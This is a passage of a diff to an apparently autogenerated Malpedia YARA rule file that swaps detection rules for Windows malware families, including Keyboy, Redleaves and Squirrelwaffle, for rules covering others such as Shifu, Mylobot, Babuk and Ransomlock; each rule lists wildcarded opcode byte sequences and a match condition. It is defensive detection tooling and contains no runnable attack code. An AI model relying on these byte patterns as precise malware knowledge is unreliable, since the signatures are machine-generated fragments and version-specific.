"75c1414f6695a00e2fea038874de3164067ad0287567965dcfd36d5ca522d078" score = 75 quality = 75 tags = "FILE" @@ -183028,34 +185848,40 @@ rule MALPEDIA_Win_Yoddos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 0f84e0010000 8d8584fcffff 56 50 } - $sequence_1 = { 66895dd8 66895dda 6a0e e8???????? 59 8a8485a4ecffff 8845dc } - $sequence_2 = { 740c ffb5c0fcffff ff15???????? b863000000 90 b89dffffff } - $sequence_3 = { c6458e65 c6458f6e c6459055 c6459172 c645926c c6459341 } - $sequence_4 = { b89dffffff 90 33db 891d???????? b863000000 90 b89dffffff } - $sequence_5 = { 0c01 c1f905 83e61f 88450b 8d3c8d00764100 c1e603 } - $sequence_6 = { 895dfc c78538ffffff62000000 68???????? 50 e8???????? ff7508 8d8524feffff } - $sequence_7 = { 57 ff7508 e8???????? 8bf8 56 037d08 } - $sequence_8 = { 0fb7750c 6683f97e 7502 33c9 0fb7d1 8a945504ffffff 3010 } - $sequence_9 = { eb28 8d4df0 6a10 51 } + $sequence_0 = { 13f2 a3???????? 8935???????? 890d???????? 8bc1 5e } + $sequence_1 = { 030d???????? a3???????? a1???????? 13f2 a3???????? } + $sequence_2 = { 13f2 33d2 030d???????? a3???????? } + $sequence_3 = { 8bc2 034508 5e 5d c3 55 } + $sequence_4 = { 03c8 a1???????? 13f2 33d2 } + $sequence_5 = { 56 8bf2 ba06e0a636 f7e2 } + $sequence_6 = { 397508 7604 33c0 eb12 } + $sequence_7 = { 2b7508 33d2 46 f7f6 8bc2 034508 } + $sequence_8 = { 8d85ecfbffff 57 50 e8???????? 83c410 } + $sequence_9 = { 33d7 33c1 52 50 } + $sequence_10 = { 6a7d 50 ffd6 59 } + $sequence_11 = { 8bc1 0bc7 7409 8bc1 8bd7 e9???????? } + $sequence_12 = { 57 57 8d8574ffffff 50 } + $sequence_13 = { 6a7b 50 ffd6 8bf8 59 59 } + $sequence_14 = { 53 ff15???????? 59 33c0 5e } + $sequence_15 = { a1???????? 33d2 f7f1 ff05???????? } condition: - 7 of them and filesize <557056 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Keyboy_Auto : FILE +rule MALPEDIA_Win_Shifu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1db1fbfb-59c2-5bfb-976b-a0743f8a46eb" + id = "b2b85e64-d954-5aeb-b02a-9d97cb3ba3ee" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keyboy_auto.yar#L1-L207" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shifu_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c0d23ea688bcee5d6eecf54208ea66cac91415e69b2f38d43039891e2137c619" + logic_hash = "fa5868e6742fc467c77c9f2e2fa5062fd3f24b48dd60ea0ece307848b06e5759" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -183067,44 +185893,32 @@ rule MALPEDIA_Win_Keyboy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 8945f2 8d45f8 50 6a0e } - $sequence_1 = { 51 ff75d8 6a00 ff75c0 } - $sequence_2 = { c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 } - $sequence_3 = { c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 } - $sequence_4 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 55 } - $sequence_5 = { c705????????0caa6c89 c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f c705????????890e9944 } - $sequence_6 = { 57 68cc020000 8d852cfdffff 8bf2 6a00 50 89b528fdffff } - $sequence_7 = { ff75dc ff15???????? 8d45dc 50 } - $sequence_8 = { e9???????? bbfeffffff eb05 bbfdffffff } - $sequence_9 = { 24a0 3ca0 7518 b800080000 } - $sequence_10 = { 6683f806 7404 32c9 eb02 b101 } - $sequence_11 = { c705????????34fbfb41 c705????????e6cd2b66 c705????????79e66d38 c705????????ba66ea37 c705????????1671e665 c705????????f3106cb3 c705????????526c1ed0 } - $sequence_12 = { e8???????? 85c0 755e 83ff20 } - $sequence_13 = { 2408 f6d8 1ac0 24dd } - $sequence_14 = { 41 84c0 75f0 8d55ec c745ec5c417070 } - $sequence_15 = { 7cd6 5f 5e 8be5 } - $sequence_16 = { ff15???????? 8b15???????? 8b4dc0 8945b8 e8???????? } - $sequence_17 = { 7207 b901000000 eb0f 3cfe } - $sequence_18 = { f7d9 85db 0f44c2 23c8 } - $sequence_19 = { 85d2 7e2a 8bce 81e107000080 } - $sequence_20 = { 3401 0fbec0 0fafc8 80f185 880c3e 46 } - $sequence_21 = { 1ac0 24dd 88474e e8???????? } + $sequence_0 = { 85c0 740d 57 6a1b ba???????? } + $sequence_1 = { 6a24 ff7508 ffd6 53 8d45f0 50 } + $sequence_2 = { 83651800 8d941a00010000 895508 8b5510 0fbe1410 89550c 85c9 } + $sequence_3 = { 740c e8???????? 8325????????00 8d85fcfeffff e8???????? } + $sequence_4 = { 50 ff75f4 ff15???????? 85c0 7511 ff75f0 8d443701 } + $sequence_5 = { 668985a2fcffff b8170b0000 66898578fcffff 6a14 58 6689857afcffff 8b4348 } + $sequence_6 = { 83c102 836d0c02 eb2d 8bd9 8b4f2c 2bd8 035de8 } + $sequence_7 = { 8975e4 6a0c 58 e8???????? 8965e8 8bfc 3bfe } + $sequence_8 = { 33c0 5e c9 c20c00 55 8bec 85c9 } + $sequence_9 = { 56 8d85e8feffff 53 50 ff15???????? 8d85e8feffff 83c410 } condition: - 7 of them and filesize <2170880 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Lambload_Auto : FILE +rule MALPEDIA_Win_Ahtapot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ca98537a-be45-5b55-a54c-745fd9ea79b6" + id = "b3228dcd-5cf8-5afe-a611-92ad75d7ce7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lambload_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ahtapot_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "6692a5aefbbf1fabc4e1d13310c5f00b33c64ae692d0893f079fb461da4727d8" + logic_hash = "69c00171f493e14b569002ab8197f5ff4c272ce4e4b6b3103d5b52b14a5be8a4" score = 75 quality = 75 tags = "FILE" @@ -183118,32 +185932,32 @@ rule MALPEDIA_Win_Lambload_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffb5e4f7ffff e8???????? 0fb74624 57 57 6a03 } - $sequence_1 = { ff15???????? 47 83ff02 7caa 83c8ff 5f 5e } - $sequence_2 = { 74c5 57 57 57 ff7608 ff15???????? 85c0 } - $sequence_3 = { 8b6c2424 83c408 3be8 7e02 8be8 } - $sequence_4 = { 897dfc 897dd8 83ff40 0f8d3b010000 8b34bd00490710 85f6 } - $sequence_5 = { 83c420 837e1804 750d b800308000 } - $sequence_6 = { f7f9 8955fc e8???????? 99 b9ffff0000 f7f9 } - $sequence_7 = { be???????? 50 a5 e8???????? 83c40c } - $sequence_8 = { 0fb78c05ecfbffff 66898c05f4fdffff 83c002 663bce 75e8 53 8d85ecfbffff } - $sequence_9 = { 33c0 8a540430 8a8be8330710 32ca 888be8330710 43 3bdd } + $sequence_0 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8dc0f24200 83e01f } + $sequence_1 = { c686c312000001 e9???????? 6a00 6a00 56 68???????? 6a00 } + $sequence_2 = { 740b 8d85f0fdffff e8???????? 56 8d95f0fdffff 68???????? 52 } + $sequence_3 = { 8d95f0fdffff 52 ff15???????? 83f8ff 0f8585000000 8d837c060000 50 } + $sequence_4 = { 8d8e6c020000 51 8d95acf1ffff 68???????? } + $sequence_5 = { 8d3c85c0f24200 8bf3 83e61f c1e606 8b07 0fbe440604 83e001 } + $sequence_6 = { 8b958cf3ffff 8b8578f3ffff 8d8da8f3ffff 51 52 68???????? } + $sequence_7 = { 8b5df0 8bf0 8b45ec 8d140b 52 50 56 } + $sequence_8 = { 83c404 8b1d???????? 8d95bcf9ffff 52 ffd3 8b859cf1ffff } + $sequence_9 = { e8???????? 68???????? 8d55ec 52 8975f8 897dfc c745ec20a04200 } condition: - 7 of them and filesize <1039360 + 7 of them and filesize <430080 } -rule MALPEDIA_Win_Snatch_Loader_Auto : FILE +rule MALPEDIA_Win_Mylobot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "27465de5-7033-587f-a756-9377f064a810" + id = "7a067cd7-af50-5d95-bc8a-c729265f1a45" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snatch_loader_auto.yar#L1-L176" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mylobot_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "0092d0e62ac35cefc4568a8a8fbdf579b918d859e448f714bc73aa915417d36e" + logic_hash = "e9a5b8dbe1c5cc719187453536536d6ca11df9a61a8a5853882ca3075e6106f0" score = 75 quality = 75 tags = "FILE" @@ -183157,38 +185971,38 @@ rule MALPEDIA_Win_Snatch_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66894606 a1???????? 85c0 7522 6a02 59 } - $sequence_1 = { 8bc8 8b45fc 33d2 85c9 5e 0f45c2 8be5 } - $sequence_2 = { 51 56 56 ffd0 8bc8 8b45fc 33d2 } - $sequence_3 = { 33f6 8bd9 57 85c0 7522 6a02 } - $sequence_4 = { ffd0 5f 85c0 7509 8bce e8???????? } - $sequence_5 = { ffd0 85c0 8bce 0f457dfc } - $sequence_6 = { 85c0 7505 8b45fc eb0d 53 53 } - $sequence_7 = { 33f6 8bd6 8975fc 66397102 740b 42 } - $sequence_8 = { 46 3bf3 76d8 33c0 48 5a 59 } - $sequence_9 = { 741f 3a0439 7514 41 3b4df8 } - $sequence_10 = { 68???????? 58 ffd0 8945f0 0bc0 } - $sequence_11 = { 33d2 33c9 8a0431 0ac0 741f } - $sequence_12 = { 52 ff750c e8???????? 8945fc 0bc0 7454 394508 } - $sequence_13 = { 55 8bec 83c4fc 53 33db 837d0800 } - $sequence_14 = { 3b45fc 773b 8b750c 8b7d10 037508 8bde } - $sequence_15 = { 7206 3c5a 7702 0c20 c1c210 } + $sequence_0 = { ff5014 56 6a00 50 8947f8 } + $sequence_1 = { 89442414 75c7 eb02 33f6 85f6 741c } + $sequence_2 = { 0f8344030000 8b0c83 8b442428 3bc8 0f823e020000 03442418 } + $sequence_3 = { 83c41c 2b4734 7409 50 53 e8???????? } + $sequence_4 = { 898108010000 8d442414 50 68???????? } + $sequence_5 = { 51 ff742410 50 8d84248c020000 50 } + $sequence_6 = { a1???????? 53 ff507c 8bf8 85ff 0f8491000000 8d442410 } + $sequence_7 = { 81eccc000000 8b450c 53 56 57 8b00 } + $sequence_8 = { 75cc 80bdfcfdffff01 0f8581000000 68???????? ff15???????? } + $sequence_9 = { c785d4fdffff28010000 ff15???????? 8d8dd4fdffff 8bf8 } + $sequence_10 = { 2bc2 8bc8 8bc3 8d7801 } + $sequence_11 = { 83bd48ffffff00 0f85e9000000 807dda01 0f95c0 } + $sequence_12 = { 7857 8b07 85c0 7462 } + $sequence_13 = { ffd3 68???????? 8d742414 e8???????? 83c404 85c0 } + $sequence_14 = { 897df4 3bc7 743d 8d55f4 } + $sequence_15 = { 8bf0 81fed0040000 750e 8b4718 50 57 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <8028160 } -rule MALPEDIA_Win_Woody_Auto : FILE +rule MALPEDIA_Win_Absentloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "35fc0a5e-5caa-5b81-a357-ce6a48801a6d" + id = "9aab04f2-7678-5cf8-8d74-f6db3f7fcf22" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woody_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.absentloader_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "d359ba0a50d4da9f9c37f195345e1d8ee165deec7ea255ed2ce67ccf9ad5785a" + logic_hash = "77496690e6eb66a44354cd3e27ded72ee59f2468546d53e2a80ae68b108dd0bf" score = 75 quality = 75 tags = "FILE" @@ -183202,32 +186016,32 @@ rule MALPEDIA_Win_Woody_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 59 7412 8d4604 50 8d85e4feffff } - $sequence_1 = { 0f8501ffffff 53 ff15???????? a1???????? 85c0 7410 6860ea0000 } - $sequence_2 = { 8975ec 3bce 8b35???????? 894ddc 0f86b1000000 8d580a 8b4df4 } - $sequence_3 = { 8d8e10010000 c645fc01 e8???????? 8d8e18010000 c645fc02 e8???????? 8d8e20010000 } - $sequence_4 = { 50 e8???????? 8b45f4 83c424 813800000080 7239 8b75c8 } - $sequence_5 = { 59 5b 0f94c0 5f 5e c9 c20c00 } - $sequence_6 = { 48 0f8592000000 6a00 6a00 6a00 ff15???????? } - $sequence_7 = { 85db 7503 57 eb15 8d45fc 6a00 50 } - $sequence_8 = { 8945e0 294de0 894d14 8b45e0 8b4d14 03c1 8d4db0 } - $sequence_9 = { 3bcb 89442450 7412 8b8e0c010000 c74424540e000000 3bcb 7504 } + $sequence_0 = { fe81b89406fd 89148d909406fd 8d4dfc e8???????? 5e c9 c3 } + $sequence_1 = { eb16 66c704375c6e eb0e 66c704375c74 eb06 66c704375c62 83c602 } + $sequence_2 = { e8???????? c645fc12 8bcb 0f2805???????? 0f1145b4 6a7f } + $sequence_3 = { 740f 33c0 80b034a606fd2e 40 83f814 72f3 8b0d???????? } + $sequence_4 = { 8bec 56 ff7508 8bf1 e8???????? c706841e05fd } + $sequence_5 = { 7408 3a8ac05d05fd 755a 8b06 8a08 40 42 } + $sequence_6 = { 7e37 68f8aa06fd e8???????? 833d????????ff 59 7523 bffcaa06fd } + $sequence_7 = { 7417 6827130000 6830f405fd 68341606fd e8???????? 83c40c 837f2c00 } + $sequence_8 = { c9 c3 6a08 b8a30305fd e8???????? 8bf1 8975ec } + $sequence_9 = { 84db 743b 8b4608 8378fc00 7432 83ec10 8d4668 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <794624 } -rule MALPEDIA_Win_Ramsay_Auto : FILE +rule MALPEDIA_Win_Chches_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "419ecbad-236d-5c68-9c96-e25af72dd2b4" + id = "a2d17035-5b65-5ddb-9479-7e5b4a4aa253" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramsay_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chches_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "eb3826746ddecabb3a90d33f9a9bdc63a3e0601a54105640bc672d97b2815450" + logic_hash = "90b994c4c0ea91e131f92144cfcd7cc30920c864cbd411a57992ff45077985cd" score = 75 quality = 75 tags = "FILE" @@ -183241,40 +186055,34 @@ rule MALPEDIA_Win_Ramsay_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7514 ff15???????? 83f820 } - $sequence_1 = { 83f820 7502 eb07 33c0 e9???????? } - $sequence_2 = { ff15???????? 85c0 7502 eb02 ebb1 } - $sequence_3 = { 83c201 8955f8 837df808 731e 8b45f8 } - $sequence_4 = { 894df1 884df5 c745ec00000000 6a06 8d55f0 52 } - $sequence_5 = { 83c404 8945f8 8b4d08 83c101 51 6a00 8b55f8 } - $sequence_6 = { 8b02 ba02000000 f7e2 0f90c1 f7d9 } - $sequence_7 = { 8945f8 837df8ff 7507 33c0 e9???????? 6a00 8b4df8 } - $sequence_8 = { 8a481c 884a15 8b5508 8b4508 } - $sequence_9 = { 3b4d08 732c e8???????? 33d2 b93e000000 } - $sequence_10 = { ff15???????? 85c0 751a 8b4df8 51 } - $sequence_11 = { ff15???????? 33c0 e9???????? e8???????? 85c0 7507 33c0 } - $sequence_12 = { e8???????? eb2b 83f8ff 7526 4c8d253b490100 } - $sequence_13 = { e8???????? eb20 488d542470 488d0d1afa0100 e8???????? 4533c0 33d2 } - $sequence_14 = { e8???????? eb2d 4863442468 488b4c2458 } - $sequence_15 = { e8???????? eb31 488b8c2428110000 e8???????? } + $sequence_0 = { 8b45f4 8b7dfc 50 8b8628020000 ffd0 8b45f8 85c0 } + $sequence_1 = { 85c0 7e0b 8b55f8 8b435c 6aff 52 } + $sequence_2 = { 8d5f18 85db 7477 8b16 8b4244 8b4018 } + $sequence_3 = { 8b16 8945fc 8b4244 3bc7 0f842b020000 8b00 8b7dfc } + $sequence_4 = { b810000000 e8???????? 83c420 8945f0 c745f400000000 85c0 0f8405010000 } + $sequence_5 = { 66890c78 47 ba2a000000 8d8d98fdffff 66891478 8b9680020000 51 } + $sequence_6 = { 8b4004 85c0 7475 3902 746d 8b4e64 50 } + $sequence_7 = { 81e980191001 03c1 50 68bfa2c2cd 687f90b056 68a71001fe 686021a031 } + $sequence_8 = { 895da0 85db 740f 8b87b8010000 8d5594 52 53 } + $sequence_9 = { c745f401000000 eb1c 50 6a08 ffd2 50 } condition: - 7 of them and filesize <2031616 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Redleaves_Auto : FILE +rule MALPEDIA_Win_Avcrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cc8fab97-eb1b-5c40-a45f-7f10d21eb6b6" + id = "f0c2c6c6-0e09-5b4b-89b9-13d38222f492" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redleaves_auto.yar#L1-L162" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avcrypt_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "1a1a0a58298bb01a37c19c26700f5fe323706257844254db91cc834d1d6766e7" + logic_hash = "ac05395b3ceaf430ebcb56d0def5da87a92c07f9636a33b891b2fc3647618543" score = 75 - quality = 69 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -183286,39 +186094,32 @@ rule MALPEDIA_Win_Redleaves_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 7565 7279 55 7365 7254 } - $sequence_1 = { 47 657449 7041 64647254 } - $sequence_2 = { 54 53 51 7565 } - $sequence_3 = { 9c 894504 9c 9c } - $sequence_4 = { 83e901 0f85edffffff 89d0 29f8 5f 5b } - $sequence_5 = { 8d64241c d2c0 8a01 9c } - $sequence_6 = { 59 89f9 8d64241c d2c0 } - $sequence_7 = { 8b04b0 8b4018 898588fdffff 8d8578fdffff } - $sequence_8 = { 8b04b0 ff7018 ff701c 8d85acfdffff } - $sequence_9 = { 8bec 8b550c 53 8bd9 85d2 7f05 } - $sequence_10 = { 50 57 ffb610020000 e8???????? } - $sequence_11 = { 8bec a1???????? 56 85c0 7452 } - $sequence_12 = { 53 53 6804010000 8d85acfeffff } - $sequence_13 = { 8b04b0 83c41c 53 53 } - $sequence_14 = { 50 57 ffb60c020000 e8???????? 83c40c 8b860c020000 } - $sequence_15 = { 54 9c 60 9c } - $sequence_16 = { 9c 9c 8f442420 9c } + $sequence_0 = { 68???????? ffd3 834dfcff 8d4dd8 56 6a01 e8???????? } + $sequence_1 = { 8bc7 8bcf c1f805 83e11f c1e106 030c8580b54300 eb05 } + $sequence_2 = { 8d4dc0 56 e8???????? 59 6a0e 33f6 5b } + $sequence_3 = { c705????????70484300 c705????????8cbf4300 890d???????? 8935???????? } + $sequence_4 = { 50 ff15???????? 83c8ff e9???????? 57 6a09 59 } + $sequence_5 = { ff15???????? 85c0 7507 68???????? ffd6 895de4 837dd000 } + $sequence_6 = { 68???????? e8???????? 83ec18 c745fc15000000 8bcc 8965d4 53 } + $sequence_7 = { c645fc0e 837db800 7519 68???????? 8d8d78ffffff e8???????? } + $sequence_8 = { e8???????? 68???????? 8d8d84feffff c645fc08 e8???????? 68???????? 8d8d9cfeffff } + $sequence_9 = { e8???????? c645fc01 8b5de0 85db 7404 8b13 } condition: - 7 of them and filesize <1679360 + 7 of them and filesize <6160384 } -rule MALPEDIA_Win_Chewbacca_Auto : FILE +rule MALPEDIA_Win_Babuk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "222f6780-8c77-5a93-9b3a-f1a76242c8a5" + id = "d5eda12f-ea4b-52c1-b2a1-b261c48c105c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chewbacca_auto.yar#L1-L95" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babuk_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "026e724d28dad06de27f1ece049f17b6c66ca8975467e2769de70691ea3bc834" + logic_hash = "55094f2694a9f4921a100bba31a1afb9b9947feff6d1ffe3b263a4bd8f4c17f7" score = 75 quality = 75 tags = "FILE" @@ -183332,71 +186133,79 @@ rule MALPEDIA_Win_Chewbacca_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? c645f401 8a45f4 5b c9 } - $sequence_1 = { e8???????? c645c800 8b45cc 8b10 } - $sequence_2 = { e8???????? c645f000 8b45f4 8b80b4010000 } - $sequence_3 = { e8???????? c645a400 c645f400 806df401 } - $sequence_4 = { e8???????? c645d001 8a45d0 5f } - $sequence_5 = { e8???????? c645ec01 e9???????? 8b55dc } - $sequence_6 = { e8???????? c645f401 e8???????? 8d4590 e8???????? 58 } - $sequence_7 = { e8???????? c645a400 6a00 8b45f8 8b00 898554ffffff } + $sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 } + $sequence_1 = { 50 ff15???????? 83f803 7502 } + $sequence_2 = { 8b45fc 83c002 8945fc 837dfc0a 0f83dc000000 8b4dfc } + $sequence_3 = { 8b4d08 8b540104 52 8b0401 50 e8???????? } + $sequence_4 = { 8b4dfc c1e108 ba01000000 d1e2 8b4508 } + $sequence_5 = { 8b95ccfdffff 83c201 8995ccfdffff 83bdccfdffff1f 735f 8d85f4fdffff } + $sequence_6 = { 8b4dfc 8b5508 8b44ca04 50 } + $sequence_7 = { 8b4d08 c7040100000000 c744010400000000 ba08000000 } + $sequence_8 = { 0bca 894dfc 8b45fc c1e008 b901000000 } + $sequence_9 = { 8b0401 50 e8???????? 83c408 8945ec 8955f0 } + $sequence_10 = { c744010400000000 ba08000000 6bc200 8b4d08 } + $sequence_11 = { 8b4508 c704107465206b c745fc00000000 eb09 } + $sequence_12 = { 744a 837dd801 7444 8b55ec 52 ff15???????? 8d45ac } + $sequence_13 = { e8???????? 83c410 c78574ffffff00000000 eb0f } + $sequence_14 = { 57 b808000000 6bc80a 8b5508 c7040a00000000 c7440a0400000000 c745fc00000000 } + $sequence_15 = { 51 e8???????? 83c408 8945f4 8955f8 } condition: - 7 of them and filesize <9764864 + 7 of them and filesize <183296 } -rule MALPEDIA_Win_Squirrelwaffle_Auto : FILE +rule MALPEDIA_Win_Unidentified_075_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "67d18a0f-cebe-56e6-8b79-40dff03f1fb3" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.squirrelwaffle_auto.yar#L1-L114" + id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f" + date = "2023-07-11" + modified = "2023-07-15" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_075_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "2fb7fd7c7f2885b81fdacc79e3b0b0578babd5d7d5854f31f47508825bacd6eb" + logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230705" + malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" + malpedia_version = "20230715" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 85c0 0f85d9000000 8b458c } - $sequence_1 = { 0f431d???????? 8a00 85c9 7416 51 } - $sequence_2 = { 83c40c 8b36 ba???????? 85f6 0f853cffffff 8b7d88 } - $sequence_3 = { 85c0 0f8453020000 8b4a14 48 8945f0 8bc2 } - $sequence_4 = { 8b7310 2bc6 8975f8 57 3bc2 0f8214010000 8d0416 } - $sequence_5 = { b803000000 0f438d10fefeff ba???????? 83fe03 } - $sequence_6 = { 0f1185f8fdfeff f30f7e4710 660fd68508fefeff c7471000000000 c747140f000000 } - $sequence_7 = { 8db5f8fbffff 8d34c6 837e1410 8bc6 7202 } - $sequence_8 = { 897714 eb26 8b0d???????? 0f57c0 } - $sequence_9 = { c645cc00 8d4dd8 ff75cc 6a08 } + $sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 } + $sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? } + $sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 } + $sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 } + $sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 } + $sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff } + $sequence_6 = { 33c0 668945d0 8d4dd4 51 } + $sequence_7 = { 742c 8b4514 85c0 7421 } + $sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff } + $sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <393216 } -rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE +rule MALPEDIA_Win_Ransomlock_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "25f80772-0fe0-5361-8b46-20a23fa9313b" + id = "14d92420-c852-5e3f-a3ed-35c5bfb9c9b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.op_blockbuster_auto.yar#L1-L321" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransomlock_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "7067748769cd92b2df2df661ece0caacb6285e4ff10828657376fad1bbae3d46" + logic_hash = "febe0932e68debf15b0eb0e37d5a00d2ff8a7e3a0c0b884f506cda6ff33b2a0c" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -183408,56 +186217,32 @@ rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE malpedia_sharing = 